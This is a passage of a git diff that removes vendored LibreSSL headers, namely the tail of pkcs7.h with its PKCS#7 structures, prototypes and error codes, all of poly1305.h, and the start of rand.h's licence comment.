- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_PKCS7_H
-#define HEADER_PKCS7_H
-
-#include <openssl/opensslconf.h>
-
-#include <openssl/asn1.h>
-#include <openssl/bio.h>
-#include <openssl/ossl_typ.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#if defined(_WIN32) && defined(__WINCRYPT_H__)
-#ifndef LIBRESSL_INTERNAL
-#ifdef _MSC_VER
-#pragma message("Warning, overriding WinCrypt defines")
-#else
-#warning overriding WinCrypt defines
-#endif
-#endif
-#undef PKCS7_ISSUER_AND_SERIAL
-#undef PKCS7_SIGNER_INFO
-#endif
-
-/*
-Encryption_ID		DES-CBC
-Digest_ID		MD5
-Digest_Encryption_ID	rsaEncryption
-Key_Encryption_ID	rsaEncryption
-*/
-
-typedef struct pkcs7_issuer_and_serial_st {
-	X509_NAME *issuer;
-	ASN1_INTEGER *serial;
-} PKCS7_ISSUER_AND_SERIAL;
-
-typedef struct pkcs7_signer_info_st {
-	ASN1_INTEGER 			*version;	/* version 1 */
-	PKCS7_ISSUER_AND_SERIAL		*issuer_and_serial;
-	X509_ALGOR			*digest_alg;
-	STACK_OF(X509_ATTRIBUTE)	*auth_attr;	/* [ 0 ] */
-	X509_ALGOR			*digest_enc_alg;
-	ASN1_OCTET_STRING		*enc_digest;
-	STACK_OF(X509_ATTRIBUTE)	*unauth_attr;	/* [ 1 ] */
-
-	/* The private key to sign with */
-	EVP_PKEY			*pkey;
-} PKCS7_SIGNER_INFO;
-
-DECLARE_STACK_OF(PKCS7_SIGNER_INFO)
-
-typedef struct pkcs7_recip_info_st {
-	ASN1_INTEGER			*version;	/* version 0 */
-	PKCS7_ISSUER_AND_SERIAL		*issuer_and_serial;
-	X509_ALGOR			*key_enc_algor;
-	ASN1_OCTET_STRING		*enc_key;
-	X509				*cert; /* get the pub-key from this */
-} PKCS7_RECIP_INFO;
-
-DECLARE_STACK_OF(PKCS7_RECIP_INFO)
-
-typedef struct pkcs7_signed_st {
-	ASN1_INTEGER			*version;	/* version 1 */
-	STACK_OF(X509_ALGOR)		*md_algs;	/* md used */
-	STACK_OF(X509)			*cert;		/* [ 0 ] */
-	STACK_OF(X509_CRL)		*crl;		/* [ 1 ] */
-	STACK_OF(PKCS7_SIGNER_INFO)	*signer_info;
-
-	struct pkcs7_st			*contents;
-} PKCS7_SIGNED;
-/* The above structure is very very similar to PKCS7_SIGN_ENVELOPE.
- * How about merging the two */
-
-typedef struct pkcs7_enc_content_st {
-	ASN1_OBJECT			*content_type;
-	X509_ALGOR			*algorithm;
-	ASN1_OCTET_STRING		*enc_data;	/* [ 0 ] */
-	const EVP_CIPHER		*cipher;
-} PKCS7_ENC_CONTENT;
-
-typedef struct pkcs7_enveloped_st {
-	ASN1_INTEGER			*version;	/* version 0 */
-	STACK_OF(PKCS7_RECIP_INFO)	*recipientinfo;
-	PKCS7_ENC_CONTENT		*enc_data;
-} PKCS7_ENVELOPE;
-
-typedef struct pkcs7_signedandenveloped_st {
-	ASN1_INTEGER			*version;	/* version 1 */
-	STACK_OF(X509_ALGOR)		*md_algs;	/* md used */
-	STACK_OF(X509)			*cert;		/* [ 0 ] */
-	STACK_OF(X509_CRL)		*crl;		/* [ 1 ] */
-	STACK_OF(PKCS7_SIGNER_INFO)	*signer_info;
-
-	PKCS7_ENC_CONTENT		*enc_data;
-	STACK_OF(PKCS7_RECIP_INFO)	*recipientinfo;
-} PKCS7_SIGN_ENVELOPE;
-
-typedef struct pkcs7_digest_st {
-	ASN1_INTEGER			*version;	/* version 0 */
-	X509_ALGOR			*md;		/* md used */
-	struct pkcs7_st 		*contents;
-	ASN1_OCTET_STRING		*digest;
-} PKCS7_DIGEST;
-
-typedef struct pkcs7_encrypted_st {
-	ASN1_INTEGER			*version;	/* version 0 */
-	PKCS7_ENC_CONTENT		*enc_data;
-} PKCS7_ENCRYPT;
-
-typedef struct pkcs7_st {
-	/* The following is non NULL if it contains ASN1 encoding of
-	 * this structure */
-	unsigned char *asn1;
-	long length;
-
-#define PKCS7_S_HEADER	0
-#define PKCS7_S_BODY	1
-#define PKCS7_S_TAIL	2
-	int state; /* used during processing */
-
-	int detached;
-
-	ASN1_OBJECT *type;
-	/* content as defined by the type */
-	/* all encryption/message digests are applied to the 'contents',
-	 * leaving out the 'type' field. */
-	union	{
-		char *ptr;
-
-		/* NID_pkcs7_data */
-		ASN1_OCTET_STRING *data;
-
-		/* NID_pkcs7_signed */
-		PKCS7_SIGNED *sign;
-
-		/* NID_pkcs7_enveloped */
-		PKCS7_ENVELOPE *enveloped;
-
-		/* NID_pkcs7_signedAndEnveloped */
-		PKCS7_SIGN_ENVELOPE *signed_and_enveloped;
-
-		/* NID_pkcs7_digest */
-		PKCS7_DIGEST *digest;
-
-		/* NID_pkcs7_encrypted */
-		PKCS7_ENCRYPT *encrypted;
-
-		/* Anything else */
-		ASN1_TYPE *other;
-	} d;
-} PKCS7;
-
-DECLARE_STACK_OF(PKCS7)
-DECLARE_PKCS12_STACK_OF(PKCS7)
-
-#define PKCS7_OP_SET_DETACHED_SIGNATURE	1
-#define PKCS7_OP_GET_DETACHED_SIGNATURE	2
-
-#define PKCS7_get_signed_attributes(si)	((si)->auth_attr)
-#define PKCS7_get_attributes(si)	((si)->unauth_attr)
-
-#define PKCS7_type_is_signed(a) (OBJ_obj2nid((a)->type) == NID_pkcs7_signed)
-#define PKCS7_type_is_encrypted(a) (OBJ_obj2nid((a)->type) == NID_pkcs7_encrypted)
-#define PKCS7_type_is_enveloped(a) (OBJ_obj2nid((a)->type) == NID_pkcs7_enveloped)
-#define PKCS7_type_is_signedAndEnveloped(a) \
-		(OBJ_obj2nid((a)->type) == NID_pkcs7_signedAndEnveloped)
-#define PKCS7_type_is_data(a)   (OBJ_obj2nid((a)->type) == NID_pkcs7_data)
-#define PKCS7_type_is_digest(a)   (OBJ_obj2nid((a)->type) == NID_pkcs7_digest)
-#define PKCS7_type_is_encrypted(a) \
-		(OBJ_obj2nid((a)->type) == NID_pkcs7_encrypted)
-
-#define PKCS7_type_is_digest(a)   (OBJ_obj2nid((a)->type) == NID_pkcs7_digest)
-
-#define PKCS7_set_detached(p,v) \
-		PKCS7_ctrl(p,PKCS7_OP_SET_DETACHED_SIGNATURE,v,NULL)
-#define PKCS7_get_detached(p) \
-		PKCS7_ctrl(p,PKCS7_OP_GET_DETACHED_SIGNATURE,0,NULL)
-
-#define PKCS7_is_detached(p7) (PKCS7_type_is_signed(p7) && PKCS7_get_detached(p7))
-
-/* S/MIME related flags */
-
-#define PKCS7_TEXT		0x1
-#define PKCS7_NOCERTS		0x2
-#define PKCS7_NOSIGS		0x4
-#define PKCS7_NOCHAIN		0x8
-#define PKCS7_NOINTERN		0x10
-#define PKCS7_NOVERIFY		0x20
-#define PKCS7_DETACHED		0x40
-#define PKCS7_BINARY		0x80
-#define PKCS7_NOATTR		0x100
-#define	PKCS7_NOSMIMECAP	0x200
-#define PKCS7_NOOLDMIMETYPE	0x400
-#define PKCS7_CRLFEOL		0x800
-#define PKCS7_STREAM		0x1000
-#define PKCS7_NOCRL		0x2000
-#define PKCS7_PARTIAL		0x4000
-#define PKCS7_REUSE_DIGEST	0x8000
-
-/* Flags: for compatibility with older code */
-
-#define SMIME_TEXT	PKCS7_TEXT
-#define SMIME_NOCERTS	PKCS7_NOCERTS
-#define SMIME_NOSIGS	PKCS7_NOSIGS
-#define SMIME_NOCHAIN	PKCS7_NOCHAIN
-#define SMIME_NOINTERN	PKCS7_NOINTERN
-#define SMIME_NOVERIFY	PKCS7_NOVERIFY
-#define SMIME_DETACHED	PKCS7_DETACHED
-#define SMIME_BINARY	PKCS7_BINARY
-#define SMIME_NOATTR	PKCS7_NOATTR
-
-PKCS7_ISSUER_AND_SERIAL *PKCS7_ISSUER_AND_SERIAL_new(void);
-void PKCS7_ISSUER_AND_SERIAL_free(PKCS7_ISSUER_AND_SERIAL *a);
-PKCS7_ISSUER_AND_SERIAL *d2i_PKCS7_ISSUER_AND_SERIAL(PKCS7_ISSUER_AND_SERIAL **a, const unsigned char **in, long len);
-int i2d_PKCS7_ISSUER_AND_SERIAL(PKCS7_ISSUER_AND_SERIAL *a, unsigned char **out);
-extern const ASN1_ITEM PKCS7_ISSUER_AND_SERIAL_it;
-
-int PKCS7_ISSUER_AND_SERIAL_digest(PKCS7_ISSUER_AND_SERIAL *data,
-    const EVP_MD *type, unsigned char *md, unsigned int *len);
-PKCS7 *d2i_PKCS7_fp(FILE *fp, PKCS7 **p7);
-int i2d_PKCS7_fp(FILE *fp, PKCS7 *p7);
-PKCS7 *PKCS7_dup(PKCS7 *p7);
-PKCS7 *d2i_PKCS7_bio(BIO *bp, PKCS7 **p7);
-int i2d_PKCS7_bio(BIO *bp, PKCS7 *p7);
-int i2d_PKCS7_bio_stream(BIO *out, PKCS7 *p7, BIO *in, int flags);
-int PEM_write_bio_PKCS7_stream(BIO *out, PKCS7 *p7, BIO *in, int flags);
-
-PKCS7_SIGNER_INFO *PKCS7_SIGNER_INFO_new(void);
-void PKCS7_SIGNER_INFO_free(PKCS7_SIGNER_INFO *a);
-PKCS7_SIGNER_INFO *d2i_PKCS7_SIGNER_INFO(PKCS7_SIGNER_INFO **a, const unsigned char **in, long len);
-int i2d_PKCS7_SIGNER_INFO(PKCS7_SIGNER_INFO *a, unsigned char **out);
-extern const ASN1_ITEM PKCS7_SIGNER_INFO_it;
-PKCS7_RECIP_INFO *PKCS7_RECIP_INFO_new(void);
-void PKCS7_RECIP_INFO_free(PKCS7_RECIP_INFO *a);
-PKCS7_RECIP_INFO *d2i_PKCS7_RECIP_INFO(PKCS7_RECIP_INFO **a, const unsigned char **in, long len);
-int i2d_PKCS7_RECIP_INFO(PKCS7_RECIP_INFO *a, unsigned char **out);
-extern const ASN1_ITEM PKCS7_RECIP_INFO_it;
-PKCS7_SIGNED *PKCS7_SIGNED_new(void);
-void PKCS7_SIGNED_free(PKCS7_SIGNED *a);
-PKCS7_SIGNED *d2i_PKCS7_SIGNED(PKCS7_SIGNED **a, const unsigned char **in, long len);
-int i2d_PKCS7_SIGNED(PKCS7_SIGNED *a, unsigned char **out);
-extern const ASN1_ITEM PKCS7_SIGNED_it;
-PKCS7_ENC_CONTENT *PKCS7_ENC_CONTENT_new(void);
-void PKCS7_ENC_CONTENT_free(PKCS7_ENC_CONTENT *a);
-PKCS7_ENC_CONTENT *d2i_PKCS7_ENC_CONTENT(PKCS7_ENC_CONTENT **a, const unsigned char **in, long len);
-int i2d_PKCS7_ENC_CONTENT(PKCS7_ENC_CONTENT *a, unsigned char **out);
-extern const ASN1_ITEM PKCS7_ENC_CONTENT_it;
-PKCS7_ENVELOPE *PKCS7_ENVELOPE_new(void);
-void PKCS7_ENVELOPE_free(PKCS7_ENVELOPE *a);
-PKCS7_ENVELOPE *d2i_PKCS7_ENVELOPE(PKCS7_ENVELOPE **a, const unsigned char **in, long len);
-int i2d_PKCS7_ENVELOPE(PKCS7_ENVELOPE *a, unsigned char **out);
-extern const ASN1_ITEM PKCS7_ENVELOPE_it;
-PKCS7_SIGN_ENVELOPE *PKCS7_SIGN_ENVELOPE_new(void);
-void PKCS7_SIGN_ENVELOPE_free(PKCS7_SIGN_ENVELOPE *a);
-PKCS7_SIGN_ENVELOPE *d2i_PKCS7_SIGN_ENVELOPE(PKCS7_SIGN_ENVELOPE **a, const unsigned char **in, long len);
-int i2d_PKCS7_SIGN_ENVELOPE(PKCS7_SIGN_ENVELOPE *a, unsigned char **out);
-extern const ASN1_ITEM PKCS7_SIGN_ENVELOPE_it;
-PKCS7_DIGEST *PKCS7_DIGEST_new(void);
-void PKCS7_DIGEST_free(PKCS7_DIGEST *a);
-PKCS7_DIGEST *d2i_PKCS7_DIGEST(PKCS7_DIGEST **a, const unsigned char **in, long len);
-int i2d_PKCS7_DIGEST(PKCS7_DIGEST *a, unsigned char **out);
-extern const ASN1_ITEM PKCS7_DIGEST_it;
-PKCS7_ENCRYPT *PKCS7_ENCRYPT_new(void);
-void PKCS7_ENCRYPT_free(PKCS7_ENCRYPT *a);
-PKCS7_ENCRYPT *d2i_PKCS7_ENCRYPT(PKCS7_ENCRYPT **a, const unsigned char **in, long len);
-int i2d_PKCS7_ENCRYPT(PKCS7_ENCRYPT *a, unsigned char **out);
-extern const ASN1_ITEM PKCS7_ENCRYPT_it;
-PKCS7 *PKCS7_new(void);
-void PKCS7_free(PKCS7 *a);
-PKCS7 *d2i_PKCS7(PKCS7 **a, const unsigned char **in, long len);
-int i2d_PKCS7(PKCS7 *a, unsigned char **out);
-extern const ASN1_ITEM PKCS7_it;
-
-extern const ASN1_ITEM PKCS7_ATTR_SIGN_it;
-extern const ASN1_ITEM PKCS7_ATTR_VERIFY_it;
-
-int i2d_PKCS7_NDEF(PKCS7 *a, unsigned char **out);
-int PKCS7_print_ctx(BIO *out, PKCS7 *x, int indent, const ASN1_PCTX *pctx);
-
-long PKCS7_ctrl(PKCS7 *p7, int cmd, long larg, char *parg);
-
-int PKCS7_set_type(PKCS7 *p7, int type);
-int PKCS7_set0_type_other(PKCS7 *p7, int type, ASN1_TYPE *other);
-int PKCS7_set_content(PKCS7 *p7, PKCS7 *p7_data);
-int PKCS7_SIGNER_INFO_set(PKCS7_SIGNER_INFO *p7i, X509 *x509, EVP_PKEY *pkey,
-    const EVP_MD *dgst);
-int PKCS7_SIGNER_INFO_sign(PKCS7_SIGNER_INFO *si);
-int PKCS7_add_signer(PKCS7 *p7, PKCS7_SIGNER_INFO *p7i);
-int PKCS7_add_certificate(PKCS7 *p7, X509 *x509);
-int PKCS7_add_crl(PKCS7 *p7, X509_CRL *x509);
-int PKCS7_content_new(PKCS7 *p7, int nid);
-int PKCS7_dataVerify(X509_STORE *cert_store, X509_STORE_CTX *ctx,
-    BIO *bio, PKCS7 *p7, PKCS7_SIGNER_INFO *si);
-int PKCS7_signatureVerify(BIO *bio, PKCS7 *p7, PKCS7_SIGNER_INFO *si,
-    X509 *x509);
-
-BIO *PKCS7_dataInit(PKCS7 *p7, BIO *bio);
-int PKCS7_dataFinal(PKCS7 *p7, BIO *bio);
-BIO *PKCS7_dataDecode(PKCS7 *p7, EVP_PKEY *pkey, BIO *in_bio, X509 *pcert);
-
-
-PKCS7_SIGNER_INFO *PKCS7_add_signature(PKCS7 *p7, X509 *x509,
-    EVP_PKEY *pkey, const EVP_MD *dgst);
-X509 *PKCS7_cert_from_signer_info(PKCS7 *p7, PKCS7_SIGNER_INFO *si);
-int PKCS7_set_digest(PKCS7 *p7, const EVP_MD *md);
-STACK_OF(PKCS7_SIGNER_INFO) *PKCS7_get_signer_info(PKCS7 *p7);
-
-PKCS7_RECIP_INFO *PKCS7_add_recipient(PKCS7 *p7, X509 *x509);
-void PKCS7_SIGNER_INFO_get0_algs(PKCS7_SIGNER_INFO *si, EVP_PKEY **pk,
-    X509_ALGOR **pdig, X509_ALGOR **psig);
-void PKCS7_RECIP_INFO_get0_alg(PKCS7_RECIP_INFO *ri, X509_ALGOR **penc);
-int PKCS7_add_recipient_info(PKCS7 *p7, PKCS7_RECIP_INFO *ri);
-int PKCS7_RECIP_INFO_set(PKCS7_RECIP_INFO *p7i, X509 *x509);
-int PKCS7_set_cipher(PKCS7 *p7, const EVP_CIPHER *cipher);
-int PKCS7_stream(unsigned char ***boundary, PKCS7 *p7);
-
-PKCS7_ISSUER_AND_SERIAL *PKCS7_get_issuer_and_serial(PKCS7 *p7, int idx);
-ASN1_OCTET_STRING *PKCS7_digest_from_attributes(STACK_OF(X509_ATTRIBUTE) *sk);
-int PKCS7_add_signed_attribute(PKCS7_SIGNER_INFO *p7si, int nid, int type,
-    void *data);
-int PKCS7_add_attribute (PKCS7_SIGNER_INFO *p7si, int nid, int atrtype,
-    void *value);
-ASN1_TYPE *PKCS7_get_attribute(PKCS7_SIGNER_INFO *si, int nid);
-ASN1_TYPE *PKCS7_get_signed_attribute(PKCS7_SIGNER_INFO *si, int nid);
-int PKCS7_set_signed_attributes(PKCS7_SIGNER_INFO *p7si,
-    STACK_OF(X509_ATTRIBUTE) *sk);
-int PKCS7_set_attributes(PKCS7_SIGNER_INFO *p7si, STACK_OF(X509_ATTRIBUTE) *sk);
-
-
-PKCS7 *PKCS7_sign(X509 *signcert, EVP_PKEY *pkey, STACK_OF(X509) *certs,
-    BIO *data, int flags);
-
-PKCS7_SIGNER_INFO *PKCS7_sign_add_signer(PKCS7 *p7,
-    X509 *signcert, EVP_PKEY *pkey, const EVP_MD *md,
-    int flags);
-
-int PKCS7_final(PKCS7 *p7, BIO *data, int flags);
-int PKCS7_verify(PKCS7 *p7, STACK_OF(X509) *certs, X509_STORE *store,
-    BIO *indata, BIO *out, int flags);
-STACK_OF(X509) *PKCS7_get0_signers(PKCS7 *p7, STACK_OF(X509) *certs, int flags);
-PKCS7 *PKCS7_encrypt(STACK_OF(X509) *certs, BIO *in, const EVP_CIPHER *cipher,
-    int flags);
-int PKCS7_decrypt(PKCS7 *p7, EVP_PKEY *pkey, X509 *cert, BIO *data, int flags);
-
-int PKCS7_add_attrib_smimecap(PKCS7_SIGNER_INFO *si,
-    STACK_OF(X509_ALGOR) *cap);
-STACK_OF(X509_ALGOR) *PKCS7_get_smimecap(PKCS7_SIGNER_INFO *si);
-int PKCS7_simple_smimecap(STACK_OF(X509_ALGOR) *sk, int nid, int arg);
-
-int PKCS7_add_attrib_content_type(PKCS7_SIGNER_INFO *si, ASN1_OBJECT *coid);
-int PKCS7_add0_attrib_signing_time(PKCS7_SIGNER_INFO *si, ASN1_TIME *t);
-int PKCS7_add1_attrib_digest(PKCS7_SIGNER_INFO *si,
-    const unsigned char *md, int mdlen);
-
-int SMIME_write_PKCS7(BIO *bio, PKCS7 *p7, BIO *data, int flags);
-PKCS7 *SMIME_read_PKCS7(BIO *bio, BIO **bcont);
-
-BIO *BIO_new_PKCS7(BIO *out, PKCS7 *p7);
-
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_PKCS7_strings(void);
-
-/* Error codes for the PKCS7 functions. */
-
-/* Function codes. */
-#define PKCS7_F_B64_READ_PKCS7				 120
-#define PKCS7_F_B64_WRITE_PKCS7				 121
-#define PKCS7_F_DO_PKCS7_SIGNED_ATTRIB			 136
-#define PKCS7_F_I2D_PKCS7_BIO_STREAM			 140
-#define PKCS7_F_PKCS7_ADD0_ATTRIB_SIGNING_TIME		 135
-#define PKCS7_F_PKCS7_ADD_ATTRIB_SMIMECAP		 118
-#define PKCS7_F_PKCS7_ADD_CERTIFICATE			 100
-#define PKCS7_F_PKCS7_ADD_CRL				 101
-#define PKCS7_F_PKCS7_ADD_RECIPIENT_INFO		 102
-#define PKCS7_F_PKCS7_ADD_SIGNATURE			 131
-#define PKCS7_F_PKCS7_ADD_SIGNER			 103
-#define PKCS7_F_PKCS7_BIO_ADD_DIGEST			 125
-#define PKCS7_F_PKCS7_COPY_EXISTING_DIGEST		 138
-#define PKCS7_F_PKCS7_CTRL				 104
-#define PKCS7_F_PKCS7_DATADECODE			 112
-#define PKCS7_F_PKCS7_DATAFINAL				 128
-#define PKCS7_F_PKCS7_DATAINIT				 105
-#define PKCS7_F_PKCS7_DATASIGN				 106
-#define PKCS7_F_PKCS7_DATAVERIFY			 107
-#define PKCS7_F_PKCS7_DECRYPT				 114
-#define PKCS7_F_PKCS7_DECRYPT_RINFO			 133
-#define PKCS7_F_PKCS7_ENCODE_RINFO			 132
-#define PKCS7_F_PKCS7_ENCRYPT				 115
-#define PKCS7_F_PKCS7_FINAL				 134
-#define PKCS7_F_PKCS7_FIND_DIGEST			 127
-#define PKCS7_F_PKCS7_GET0_SIGNERS			 124
-#define PKCS7_F_PKCS7_RECIP_INFO_SET			 130
-#define PKCS7_F_PKCS7_SET_CIPHER			 108
-#define PKCS7_F_PKCS7_SET_CONTENT			 109
-#define PKCS7_F_PKCS7_SET_DIGEST			 126
-#define PKCS7_F_PKCS7_SET_TYPE				 110
-#define PKCS7_F_PKCS7_SIGN				 116
-#define PKCS7_F_PKCS7_SIGNATUREVERIFY			 113
-#define PKCS7_F_PKCS7_SIGNER_INFO_SET			 129
-#define PKCS7_F_PKCS7_SIGNER_INFO_SIGN			 139
-#define PKCS7_F_PKCS7_SIGN_ADD_SIGNER			 137
-#define PKCS7_F_PKCS7_SIMPLE_SMIMECAP			 119
-#define PKCS7_F_PKCS7_VERIFY				 117
-#define PKCS7_F_SMIME_READ_PKCS7			 122
-#define PKCS7_F_SMIME_TEXT				 123
-
-/* Reason codes. */
-#define PKCS7_R_CERTIFICATE_VERIFY_ERROR		 117
-#define PKCS7_R_CIPHER_HAS_NO_OBJECT_IDENTIFIER		 144
-#define PKCS7_R_CIPHER_NOT_INITIALIZED			 116
-#define PKCS7_R_CONTENT_AND_DATA_PRESENT		 118
-#define PKCS7_R_CTRL_ERROR				 152
-#define PKCS7_R_DECODE_ERROR				 130
-#define PKCS7_R_DECRYPTED_KEY_IS_WRONG_LENGTH		 100
-#define PKCS7_R_DECRYPT_ERROR				 119
-#define PKCS7_R_DIGEST_FAILURE				 101
-#define PKCS7_R_ENCRYPTION_CTRL_FAILURE			 149
-#define PKCS7_R_ENCRYPTION_NOT_SUPPORTED_FOR_THIS_KEY_TYPE 150
-#define PKCS7_R_ERROR_ADDING_RECIPIENT			 120
-#define PKCS7_R_ERROR_SETTING_CIPHER			 121
-#define PKCS7_R_INVALID_MIME_TYPE			 131
-#define PKCS7_R_INVALID_NULL_POINTER			 143
-#define PKCS7_R_MIME_NO_CONTENT_TYPE			 132
-#define PKCS7_R_MIME_PARSE_ERROR			 133
-#define PKCS7_R_MIME_SIG_PARSE_ERROR			 134
-#define PKCS7_R_MISSING_CERIPEND_INFO			 103
-#define PKCS7_R_NO_CONTENT				 122
-#define PKCS7_R_NO_CONTENT_TYPE				 135
-#define PKCS7_R_NO_DEFAULT_DIGEST			 151
-#define PKCS7_R_NO_MATCHING_DIGEST_TYPE_FOUND		 154
-#define PKCS7_R_NO_MULTIPART_BODY_FAILURE		 136
-#define PKCS7_R_NO_MULTIPART_BOUNDARY			 137
-#define PKCS7_R_NO_RECIPIENT_MATCHES_CERTIFICATE	 115
-#define PKCS7_R_NO_RECIPIENT_MATCHES_KEY		 146
-#define PKCS7_R_NO_SIGNATURES_ON_DATA			 123
-#define PKCS7_R_NO_SIGNERS				 142
-#define PKCS7_R_NO_SIG_CONTENT_TYPE			 138
-#define PKCS7_R_OPERATION_NOT_SUPPORTED_ON_THIS_TYPE	 104
-#define PKCS7_R_PKCS7_ADD_SIGNATURE_ERROR		 124
-#define PKCS7_R_PKCS7_ADD_SIGNER_ERROR			 153
-#define PKCS7_R_PKCS7_DATAFINAL				 126
-#define PKCS7_R_PKCS7_DATAFINAL_ERROR			 125
-#define PKCS7_R_PKCS7_DATASIGN				 145
-#define PKCS7_R_PKCS7_PARSE_ERROR			 139
-#define PKCS7_R_PKCS7_SIG_PARSE_ERROR			 140
-#define PKCS7_R_PRIVATE_KEY_DOES_NOT_MATCH_CERTIFICATE	 127
-#define PKCS7_R_SIGNATURE_FAILURE			 105
-#define PKCS7_R_SIGNER_CERTIFICATE_NOT_FOUND		 128
-#define PKCS7_R_SIGNING_CTRL_FAILURE			 147
-#define PKCS7_R_SIGNING_NOT_SUPPORTED_FOR_THIS_KEY_TYPE	 148
-#define PKCS7_R_SIG_INVALID_MIME_TYPE			 141
-#define PKCS7_R_SMIME_TEXT_ERROR			 129
-#define PKCS7_R_UNABLE_TO_FIND_CERTIFICATE		 106
-#define PKCS7_R_UNABLE_TO_FIND_MEM_BIO			 107
-#define PKCS7_R_UNABLE_TO_FIND_MESSAGE_DIGEST		 108
-#define PKCS7_R_UNKNOWN_DIGEST_TYPE			 109
-#define PKCS7_R_UNKNOWN_OPERATION			 110
-#define PKCS7_R_UNSUPPORTED_CIPHER_TYPE			 111
-#define PKCS7_R_UNSUPPORTED_CONTENT_TYPE		 112
-#define PKCS7_R_WRONG_CONTENT_TYPE			 113
-#define PKCS7_R_WRONG_PKCS7_TYPE			 114
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/poly1305.h b/thirdparty/libressl/include/openssl/poly1305.h
deleted file mode 100644
index 00ab0bf..0000000
--- a/thirdparty/libressl/include/openssl/poly1305.h
+++ /dev/null
@@ -1,49 +0,0 @@
-/* $OpenBSD: poly1305.h,v 1.3 2014/07/25 14:04:51 jsing Exp $ */
-/*
- * Copyright (c) 2014 Joel Sing <jsing@openbsd.org>
- *
- * Permission to use, copy, modify, and distribute this software for any
- * purpose with or without fee is hereby granted, provided that the above
- * copyright notice and this permission notice appear in all copies.
- *
- * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
- * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
- * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
- * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
- * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
- * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
- * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
- */
-
-#ifndef HEADER_POLY1305_H
-#define HEADER_POLY1305_H
-
-#include <openssl/opensslconf.h>
-
-#if defined(OPENSSL_NO_POLY1305)
-#error Poly1305 is disabled.
-#endif
-
-#include <stddef.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct poly1305_context {
-	size_t aligner;
-	unsigned char opaque[136];
-} poly1305_context;
-
-typedef struct poly1305_context poly1305_state;
-
-void CRYPTO_poly1305_init(poly1305_context *ctx, const unsigned char key[32]);
-void CRYPTO_poly1305_update(poly1305_context *ctx, const unsigned char *in,
-    size_t len);
-void CRYPTO_poly1305_finish(poly1305_context *ctx, unsigned char mac[16]);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif /* HEADER_POLY1305_H */
diff --git a/thirdparty/libressl/include/openssl/rand.h b/thirdparty/libressl/include/openssl/rand.h
deleted file mode 100644
index fcb2e92..0000000
--- a/thirdparty/libressl/include/openssl/rand.h
+++ /dev/null
@@ -1,127 +0,0 @@
-/* $OpenBSD: rand.h,v 1.22 2014/10/22 14:02:52 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
